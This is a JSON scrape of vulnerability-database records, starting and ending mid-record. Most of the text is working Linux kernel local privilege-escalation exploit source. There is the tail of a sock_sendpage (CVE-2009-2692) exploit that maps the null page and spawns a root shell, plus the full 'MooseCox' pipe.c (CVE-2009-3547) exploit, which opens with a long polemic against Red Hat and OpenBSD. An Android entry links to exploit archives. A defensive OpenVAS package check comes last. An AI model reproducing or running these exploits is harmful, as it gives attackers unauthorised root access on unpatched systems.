*)where;\n\n\twhile(pcb_task_struct){\n\t\tif(pcb_task_struct[0]==uid&&pcb_task_struct[1]==uid&&\n\t\t\tpcb_task_struct[2]==uid&&pcb_task_struct[3]==uid&&\n\t\t\tpcb_task_struct[4]==gid&&pcb_task_struct[5]==gid&&\n\t\t\tpcb_task_struct[6]==gid&&pcb_task_struct[7]==gid){\n\t\t\tpcb_task_struct[0]=pcb_task_struct[1]=pcb_task_struct[2]=pcb_task_struct[3]=0;\n\t\t\tpcb_task_struct[4]=pcb_task_struct[5]=pcb_task_struct[6]=pcb_task_struct[7]=0;\n\t\t\tbreak;\n\t\t}\n\t\tpcb_task_struct++;\n\t}\n\treturn;\n\t/*\n\t** By calling iret after pushing a register into kernel stack,\n\t** We don't have to go back to ring3(user mode) privilege level. dont worry. :-}\n\t**\n\t** kernel_code() function will return to its previous status which means before sendfile() system call,\n\t** after operating upon a ring0(kernel mode) privilege level.\n\t** This will enhance the viablity of the attack code even though each kernel can have different CS and DS address.\n\t*/\n}\nvoid *kernel=kernel_code;\n\nint main(int argc,char *argv[])\n{\n\tint fd_in=0,fd_out=0,offset=1;\n\tvoid *zero_page;\n\n\tuid=getuid();\n\tgid=getgid();\n\tif(uid==0){\n\t\tfprintf(stderr,\"[-] check ur uid\\n\");\n\t\treturn -1;\n\t}\n\n\t/*\n\t** There are some cases that we need mprotect due to the dependency matter with SVR4. (however, I did not confirm it yet)\n\t*/\n\tif(personality(0xffffffff)==PER_SVR4){\n\t\tif(mprotect(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC)==-1){\n\t\t\tperror(\"[-] mprotect()\");\n\t\t\treturn -1;\n\t\t}\n\t}\n\telse if((zero_page=mmap(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE,0,0))==MAP_FAILED){\n\t\t\tperror(\"[-] mmap()\");\n\t\t\treturn -1;\n\t}\n\t*(char *)0x00000000=0xff;\n\t*(char *)0x00000001=0x25;\n\t*(unsigned long *)0x00000002=(unsigned long)&kernel;\n\t*(char *)0x00000006=0xc3;\n\n\tif((fd_in=open(argv[0],O_RDONLY))==-1){\n\t\tperror(\"[-] open()\");\n\t\treturn -1;\n\t}\n\tif((fd_out=socket(PF_APPLETALK,SOCK_DGRAM,0))==-1){\n\t\tif((fd_out=socket(PF_BLUETOOTH,SOCK_DGRAM,0))==-1){\n\t\t\tperror(\"[-] socket()\");\n\t\t\treturn -1;\n\t\t}\n\t}\ngogossing:\n\t/*\n\t** Sometimes, the attacks can fail. To enlarge the possiblilty of attack,\n\t** an attacker can make all the processes runing under current user uid 0.\n\t*/\n\tif(sendfile(fd_out,fd_in,&offset,2)==-1){\n\t\tif(offset==0){\n\t\t\tperror(\"[-] sendfile()\");\n\t\t\treturn -1;\n\t\t}\n\t\tclose(fd_out);\n\t\tfd_out=socket(PF_BLUETOOTH,SOCK_DGRAM,0);\n\t}\n\tif(getuid()==uid){\n\t\tif(offset){\n\t\t\toffset=0;\n\t\t}\n\t\tgoto gogossing; /* all process */\n\t}\n\tclose(fd_in);\n\tclose(fd_out);\n\n\texecl(\"/bin/sh\",\"sh\",\"-i\",NULL);\n\treturn 0;\n}\n\n/* eoc */\n\n// milw0rm.com [2009-08-24]", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:28", "description": "\nLinux Kernel 2.x (Android) - sock_sendpage() Local Privilege Escalation", "cvss3": {}, "published": "2009-08-18T00:00:00", "type": "exploitpack", "title": "Linux Kernel 2.x (Android) - sock_sendpage() Local Privilege Escalation", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-2692"], "modified": "2009-08-18T00:00:00", "id": "EXPLOITPACK:FF3D313D03F8BCB90EE2F22064032248", "href": "", "sourceData": "Source for exploiting CVE-2009-2692 on Android; Hole is closed in Android kernels released August 2009 or later.\n\nhttp://zenthought.org/content/file/android-root-2009-08-16-source\nExploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/9477.tar.gz (android-root-20090816.tar.gz)\n\n# milw0rm.com [2009-08-18]", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:27", "description": "\nLinux Kernel 2.6.10 2.6.31.5 - pipe.c Local Privilege Escalation", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.0, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2013-12-16T00:00:00", "type": "exploitpack", "title": "Linux Kernel 2.6.10 2.6.31.5 - pipe.c Local Privilege Escalation", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3547"], "modified": "2013-12-16T00:00:00", "id": "EXPLOITPACK:587E07B26CFC9328AECA2A6FF11BCAF8", "href": "", "sourceData": "/* exp_moosecox.c\n Watch a video of the exploit here:\n http://www.youtube.com/watch?v=jt81NvaOj5Y\n\n developed entirely by Ingo Molnar (exploit writer extraordinaire!) , \n thanks to Fotis Loukos for pointing the bug out to me -- neat bug! :)\n\n dedicated to the Red Hat employees who get paid to copy+paste my \n twitter and issue security advisories, their sweet \n acknowledgement policy, and general classiness\n see: https://bugzilla.redhat.com/show_activity.cgi?id=530490\n\n \"policy\" aside, there's a word for what you guys are doing: \"plagiarism\"\n in fact, i tested this one day by posting three links to twitter,\n without any discussion on any of them. the same day, those three\n (and only those three) links were assigned CVEs, even though two of \n them weren't even security bugs (it doesn't pay to copy+paste)\n\n official Ingo Molnar (that's me) policy for acknowledgement in \n exploits requires general douche-ness or plagiarization\n official policy further dictates immediate exploit release for\n embargoed, patched bug\n\n I'll be curious to see what the CVE statistics are like for the \n kernel this year when they get compiled next year -- I'm predicting \n that when someone's watching the sleepy watchers, a more personal \n interest is taken in doing the job that you're paid to do correctly.\n\n --------------------------------------------------------------------\n\n Special PS note to Theo (I can do this here because I know he'll \n never read it -- the guy is apparently oblivious to the entire world of \n security around him -- the same world that invents the protections \n years before him that he pats himself on the back for \"innovating\")\n Seriously though, it's incredible to me that an entire team \n of developers whose sole purpose is to develop a secure operating \n system can be so oblivious to the rest of the world. They haven't \n innovated since they replaced exploitable string copies with \n exploitable string truncations 6 or so years ago.\n\n The entire joke of a thread can be read here:\n http://www.pubbs.net/openbsd/200911/4582/\n \"Our focus therefore is always on finding innovative ideas which make \n bugs very hard to exploit succesfully.\"\n \"He's too busy watching monkey porn instead of\n building researching last-year's security technology that will stop \n an exploit technique that has been exploited multiple times.\"\n \"it seems that everyone else is slowly coming around to the\n same solution.\"\n\n So let's talk about this \"innovation\" of theirs with their \n implementation of mmap_min_addr:\n\n They implemented it in 2008, a year after Linux implemented it, a \n year after the public phrack article on the bug class, more than a \n year after my mail to dailydave with the first public Linux kernel \n exploit for the bug class, and over two years after UDEREF was \n implemented in PaX (providing complete protection against the smaller \n subset of null ptr dereference bugs and the larger class of invalid \n userland access in general).\n\n OpenBSD had a public null pointer dereference exploit (agp_ioctl()) \n published for its OS in January of 2007. It took them over a year \n and a half to implement the same feature that was implemented in \n Linux a few months after my public exploit in 2007.\n\n So how can it be that \"everyone else is slowly coming around to the \n same solution\" when \"everyone else\" came to that solution over a \n year before you Theo? In fact, I prediced this exact situation would \n happen back in 2007 in my DD post:\n http://lists.virus.org/dailydave-0703/msg00011.html\n \"Expect OpenBSD to independently invent a protection against null ptr \n deref bugs sometime in 2009.\"\n\n Let's talk about some more \"innovation\" -- position independent \n executables. PaX implemented position independent executables on \n Linux back in 2001 (ET_DYN). PIE binary support was added to GNU \n binutils in 2003. Those OpenBSD innovators implemented PIE binaries \n in 2008, 7 years after PaX. Innovation indeed!\n\n How about their W^X/ASLR innovation? These plagiarists have the \n audacity to announce on their press page:\n http://www.openbsd.org/press.html\n \"Microsoft borrows one of OpenBSD's security features for Vista, \n stack/library randomization, under the name Address Space Layout \n Randomization (ASLR). \"Until now, the feature has been most \n prominently used in the OpenBSD Unix variant and the PaX and Exec \n Shield security patches for Linux\"\"\n Borrowing one of your features? Where'd this ASLR acronym come from \n anyway? Oh that's right, PaX again -- when they published the first \n design and implementation of it, and coined the term, in July 2001.\n It covered the heap, mmap, and stack areas.\n OpenBSD implemented \"stack-gap randomization\" in 2003. Way to \n innovate!\n\n W^X, which is a horrible name as OpenBSD doesn't even enforce it with \n mprotect restrictions like PaX did from the beginning or even SELinux \n is doing now (from a 3rd party contribution modeled after PaX): \n PaX implemented true per-page non-executable page support, protecting \n binary data, the heap, and the stack, back in 2000.\n OpenBSD implemented it in 2003, requiring a full userland rebuild.\n The innovation is overwhelming!\n\n They keep coming up with the same exact \"innovations\" others came up \n with years before them. Their official explanation for where they \n got the W^X/ASLR ideas was a drunk guy came into their tent at one of \n their hack-a-thons and started talking about the idea. They had \n never heard of PaX when we asked them in 2003. Which makes the \n following involuntarily contributed private ICB logs from Phrack #66\n (Internet Citizen's Band -- OpenBSD internal chat network) so intriguing:\n\n On some sunny day in July 2002 (t: Theo de Raadt):\n <cloder> why can't you just randomize the base\n <cloder> that's what PaX does\n <t> You've not been paying attention to what art's saying, or you don't \n understand yet, either case is one of think it through yourself.\n <cloder> whatever\n\n Only to see poetic justice in August 2003 (ttt: Theo again):\n\n <miod> more exactly, we heard of pax when they started bitching\n <ttt> miod, that was very well spoken.\n\n That wraps up our OpenBSD history lesson, in case anyone forgot it.\n PS -- enjoy that null ptr deref exploit just released for OpenBSD.\n\n --------------------------------------------------------------------\n\n Important final exploit notes:\n\n don't forget to inspect /boot/config* to see if PREEMPT, LOCKBREAK,\n or DEBUG_SPINLOCK are enabled and modify the structures below \n accordingly -- a fancier exploit would do this automatically\n\n I've broken the 2.4->2.6.10 version of the exploit and would like to see \n someone fix it ;) See below for more comments on this.\n*/\n\n#define _GNU_SOURCE\n#include <stdio.h>\n#include <unistd.h>\n#include <fcntl.h>\n#include <string.h>\n#include <stdlib.h>\n#include <sys/types.h>\n#include <sched.h>\n#include <signal.h>\n#include <sys/syscall.h>\n#include <sys/utsname.h>\n#include \"exp_framework.h\"\n\nint pipefd[2];\nstruct exploit_state *exp_state;\nint is_old_kernel = 0;\n\nint go_go_speed_racer(void *unused)\n{\n int ret;\n\n while(!exp_state->got_ring0) {\n /* bust spinlock */\n *(unsigned int *)NULL = is_old_kernel ? 0 : 1;\n ret = pipe(pipefd);\n if (!ret) {\n close(pipefd[0]);\n close(pipefd[1]);\n }\n }\n\n return 0;\n}\n\n/* <3 twiz/sgrakkyu */\nint start_thread(int (*f)(void *), void *arg)\n{\n char *stack = malloc(0x4000);\n int tid = clone(f, stack + 0x4000 - sizeof(unsigned long), CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_VM, arg);\n if (tid < 0) {\n printf(\"can't create thread\\n\");\n exit(1);\n }\n sleep(1);\n return tid;\n}\n\nchar *desc = \"MooseCox: Linux <= 2.6.31.5 pipe local root\";\nchar *cve = \"CVE-2009-3547\";\n\n#define PIPE_BUFFERS 16\n\n/* this changes on older kernels, but it doesn't matter to our method */\nstruct pipe_buf_operations {\n int can_merge;\n void *map;\n void *unmap;\n void *confirm;\n void *release;\n void *steal;\n void *get;\n};\n\nstruct pipe_buffer2620ornewer {\n void *page;\n unsigned int offset, len;\n void *ops;\n unsigned int flags;\n unsigned long private;\n};\n\nstruct pipe_buffer2619orolder {\n void *page;\n unsigned int offset, len;\n void *ops;\n unsigned int flags;\n};\n\nstruct pipe_buffer2616orolder {\n void *page;\n unsigned int offset, len;\n void *ops;\n};\n\nstruct pipe_inode_info2620ornewer {\n unsigned int spinlock;\n /*\n // LOCKBREAK\n unsigned int break_lock;\n // DEBUG_SPINLOCK\n unsigned int magic, owner_cpu;\n void *owner;\n */\n void *next, *prev;\n unsigned int nrbufs, curbuf;\n void *tmp_page;\n unsigned int readers;\n unsigned int writers;\n unsigned int waiting_writers;\n unsigned int r_counter;\n unsigned int w_counter;\n void *fasync_readers;\n void *fasync_writers;\n void *inode;\n struct pipe_buffer2620ornewer bufs[PIPE_BUFFERS];\n};\n\nstruct pipe_inode_info2619orolder {\n unsigned int spinlock;\n /*\n // if PREEMPT enabled\n unsigned int break_lock;\n // DEBUG_SPINLOCK\n unsigned int magic, owner_cpu;\n void *owner;\n */\n void *next, *prev;\n unsigned int nrbufs, curbuf;\n struct pipe_buffer2619orolder bufs[PIPE_BUFFERS];\n void *tmp_page;\n unsigned int start;\n unsigned int readers;\n unsigned int writers;\n unsigned int waiting_writers;\n unsigned int r_counter;\n unsigned int w_counter;\n void *fasync_readers;\n void *fasync_writers;\n void *inode;\n};\n\nstruct pipe_inode_info2616orolder {\n unsigned int spinlock;\n /*\n // if PREEMPT enabled\n unsigned int break_lock;\n // DEBUG_SPINLOCK\n unsigned int magic, owner_cpu;\n */\n void *owner;\n void *next, *prev;\n unsigned int nrbufs, curbuf;\n struct pipe_buffer2616orolder bufs[PIPE_BUFFERS];\n void *tmp_page;\n unsigned int start;\n unsigned int readers;\n unsigned int writers;\n unsigned int waiting_writers;\n unsigned int r_counter;\n unsigned int w_counter;\n void *fasync_readers;\n void *fasync_writers;\n};\n\nstruct fasync_struct {\n int magic;\n int fa_fd;\n struct fasync_struct *fa_next;\n void *file;\n};\n\nstruct pipe_inode_info2610orolder {\n /* this includes 2.4 kernels */\n unsigned long lock; // can be rw or spin\n void *next, *prev;\n char *base;\n unsigned int len;\n unsigned int start;\n unsigned int readers;\n unsigned int writers;\n /* 2.4 only */\n unsigned int waiting_readers;\n\n unsigned int waiting_writers;\n unsigned int r_counter;\n unsigned int w_counter;\n /* 2.6 only */\n struct fasync_struct *fasync_readers;\n struct fasync_struct *fasync_writers;\n};\n\nint prepare(unsigned char *buf)\n{ \n struct pipe_inode_info2610orolder *info_oldest = (struct pipe_inode_info2610orolder *)buf;\n struct pipe_inode_info2616orolder *info_older = (struct pipe_inode_info2616orolder *)buf;\n struct pipe_inode_info2619orolder *info_old = (struct pipe_inode_info2619orolder *)buf;\n struct pipe_inode_info2620ornewer *info_new = (struct pipe_inode_info2620ornewer *)buf;\n struct pipe_buf_operations *ops = (struct pipe_buf_operations *)0x800;\n int i;\n int newver;\n struct utsname unm;\n\n i = uname(&unm);\n if (i != 0) {\n printf(\"unable to get kernel version\\n\");\n exit(1);\n }\n\n if (strlen(unm.release) >= 6 && unm.release[2] == '6' && unm.release[4] >= '2' && unm.release[5] >= '0' && unm.release[5] <= '9') {\n fprintf(stdout, \" [+] Using newer pipe_inode_info layout\\n\");\n newver = 3;\n } else if (strlen(unm.release) >= 6 && unm.release[2] == '6' && unm.release[4] >= '1' && unm.release[5] >= '7' && unm.release[5] <= '9') {\n fprintf(stdout, \" [+] Using older pipe_inode_info layout\\n\");\n newver = 2;\n } else if (strlen(unm.release) >= 5 && unm.release[2] == '6') {\n fprintf(stdout, \" [+] Using older-er pipe_inode_info layout\\n\");\n newver = 1;\n// } else if (strlen(unm.release) >= 5 && unm.release[2] >= '4') {\n// is_old_kernel = 1;\n// newver = 0;\n } else {\n fprintf(stdout, \" [+] This kernel is still vulnerable, but I can't be bothered to write the exploit. Write it yourself.\\n\");\n exit(1);\n }\n\n /* for most of these what will happen is our write will\n cause ops->confirm(/pin) to be called, which we've replaced\n with own_the_kernel\n for the 2.6.10->2.6.16 case it has no confirm/pin op, so what gets\n called instead (repeatedly) is the release op\n */\n if (newver == 3) {\n /* uncomment for DEBUG_SPINLOCK */\n //info_new->magic = 0xdead4ead;\n /* makes list_head empty for wake_up_common */\n info_new->next = &info_new->next;\n info_new->readers = 1;\n info_new->writers = 1;\n info_new->nrbufs = 1;\n info_new->curbuf = 1;\n for (i = 0; i < PIPE_BUFFERS; i++)\n info_new->bufs[i].ops = (void *)ops;\n } else if (newver == 2) {\n /* uncomment for DEBUG_SPINLOCK */\n //info_old->magic = 0xdead4ead;\n /* makes list_head empty for wake_up_common */\n info_old->next = &info_old->next;\n info_old->readers = 1;\n info_old->writers = 1;\n info_old->nrbufs = 1;\n info_old->curbuf = 1;\n for (i = 0; i < PIPE_BUFFERS; i++)\n info_old->bufs[i].ops = (void *)ops;\n } else if (newver == 1) {\n /* uncomment for DEBUG_SPINLOCK */\n //info_older->magic = 0xdead4ead;\n /* makes list_head empty for wake_up_common */\n info_older->next = &info_older->next;\n info_older->readers = 1;\n info_older->writers = 1;\n info_older->nrbufs = 1;\n info_older->curbuf = 1;\n /* we'll get called multiple times from free_pipe_info\n but it's ok because own_the_kernel handles this case\n */\n for (i = 0; i < PIPE_BUFFERS; i++)\n info_older->bufs[i].ops = (void *)ops;\n } else {\n /*\n different ballgame here, instead of being able to \n provide a function pointer in the ops table, you \n control a base address used to compute the address for \n a copy into the kernel via copy_from_user. The \n following should get you started.\n */\n /* lookup symbol for writable fptr then trigger it later\n change the main write in the one thread to write out \n pointers with the value of exp_state->exploit_kernel\n */\n info_oldest->base = (char *)0xc8000000;\n info_oldest->readers = 1;\n info_oldest->writers = 1;\n return 0;\n }\n\n ops->can_merge = 1;\n for (i = 0; i < 16; i++)\n ((void **)&ops->map)[i] = exp_state->own_the_kernel;\n\n return 0;\n}\n\nint requires_null_page = 1;\n\nint get_exploit_state_ptr(struct exploit_state *ptr)\n{\n exp_state = ptr;\n return 0;\n}\n\nint trigger(void)\n{\n char buf[128];\n int fd;\n int i = 0;\n\n /* ignore sigpipe so we don't bail out early */\n signal(SIGPIPE, SIG_IGN);\n\n start_thread(go_go_speed_racer, NULL);\n\n fprintf(stdout, \" [+] We'll let this go for a while if needed...\\n\");\n fflush(stdout);\n\n while (!exp_state->got_ring0 && i < 10000000) {\n fd = pipefd[1];\n sprintf(buf, \"/proc/self/fd/%d\", fd);\n fd = open(buf, O_WRONLY | O_NONBLOCK);\n if (fd >= 0) {\n /* bust spinlock */\n *(unsigned int *)NULL = is_old_kernel ? 0 : 1;\n write(fd, \".\", 1);\n close(fd);\n }\n i++;\n }\n\n if (!exp_state->got_ring0) {\n fprintf(stdout, \" [+] Failed to trigger the vulnerability. Is this a single processor machine with CONFIG_PREEMPT_NONE=y?\\n\");\n return 0;\n }\n\n return 1;\n}\n\nint post(void)\n{\n// return RUN_ROOTSHELL;\n return FUNNY_PIC_AND_ROOTSHELL;\n}", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2018-01-18T11:04:33", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1023-1", "cvss3": {}, "published": "2010-12-09T00:00:00", "type": "openvas", "title": "Ubuntu Update for Linux kernel vulnerabilities USN-1023-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3850", "CVE-2010-3848", "CVE-2010-3849"], "modified": "2018-01-17T00:00:00", "id": "OPENVAS:1361412562310840544", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310840544", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1023_1.nasl 8447 2018-01-17 16:12:19Z teissa $\n#\n# Ubuntu Update for Linux kernel vulnerabilities USN-1023-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Nelson Elhage discovered several problems with the Acorn Econet protocol\n driver. A local user could cause a denial of service via a NULL pointer\n dereference, escalate privileges by overflowing the kernel stack, and\n assign Econet addresses to arbitrary interfaces.\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1023-1\";\ntag_affected = \"Linux kernel vulnerabilities on Ubuntu 6.06 LTS ,\n Ubuntu 8.04 LTS ,\n Ubuntu 9.10 ,\n Ubuntu 10.04 LTS ,\n Ubuntu 10.10\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1023-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.840544\");\n script_version(\"$Revision: 8447 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-17 17:12:19 +0100 (Wed, 17 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-12-09 08:26:35 +0100 (Thu, 09 Dec 2010)\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"1023-1\");\n script_cve_id(\"CVE-2010-3848\", \"CVE-2010-3849\", \"CVE-2010-3850\");\n script_name(\"Ubuntu Update for Linux kernel vulnerabilities USN-1023-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU9.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-307-ec2\", ver:\"2.6.31-307.22\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-307-ec2\", ver:\"2.6.31-307.22\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-22-386\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-22-generic-pae\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-22-generic\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-22-386\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-22-generic-pae\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-22-generic\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-22-virtual\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-ec2-doc\", ver:\"2.6.31-307.22\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-ec2-source-2.6.31\", ver:\"2.6.31-307.22\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-307\", ver:\"2.6.31-307.22\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-doc\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-22\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-source-2.6.31\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"block-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"char-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crypto-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"firewire-core-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"floppy-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-core-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-secondary-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"input-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mouse-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 